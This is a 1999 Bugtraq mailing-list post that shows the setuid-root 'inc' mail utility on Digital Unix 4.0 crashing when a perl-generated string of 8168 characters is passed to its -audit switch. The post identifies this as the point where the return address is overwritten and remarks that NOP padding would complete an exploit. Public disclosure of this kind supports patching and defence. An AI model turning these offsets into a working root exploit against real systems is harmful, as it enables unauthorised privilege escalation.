[9246] in bugtraq
Re: Digital Unix 4.0 exploitable buffer overflows
daemon@ATHENA.MIT.EDU (Larry W. Cashdollar)
Wed Jan 27 12:11:32 1999
Date: Tue, 26 Jan 1999 15:46:27 -0500
Reply-To: "Larry W. Cashdollar" <lwcashd@TROUT.BIW.COM>
From: "Larry W. Cashdollar" <lwcashd@TROUT.BIW.COM>
To: BUGTRAQ@NETSPACE.ORG
I decided to inspect this a little more on a Digital unix box I had access too.
alpha>> uname -a
OSF1 xxx V4.0 878 alpha
alpha>> head -1 /etc/motd
Digital UNIX V4.0D (Rev. 878); Tue Jul 7 08:39:27 EDT 1998
alpha>> ls -l /usr/bin/mh/inc
-rws--x--x 1 root bin 73728 Dec 29 1997 /usr/bin/mh/inc*
alpha>> /usr/bin/mh/inc +foo -audit `perl -e 'print "a" x 8169'` foo
Segmentation fault
alpha>> /usr/bin/mh/inc +foo -audit `perl -e 'print "a" x 8168'` foo
Illegal instruction
alpha>> /usr/bin/mh/inc +foo -audit `perl -e 'print "a" x 8167'` foo
Segmentation fault
alpha>> /usr/bin/mh/inc +foo -audit `perl -e 'print "a" x 8166'` foo
inc: usage: inc [+folder] [switches]
We see at 8168 a's we have overflowed the return address. If I wasnt married
I could probably follow this up with the exploit. Just a little nop padding and
I think it would be the perfect example of a buffer overflow exploit.
-- Larry W. Cashdollar
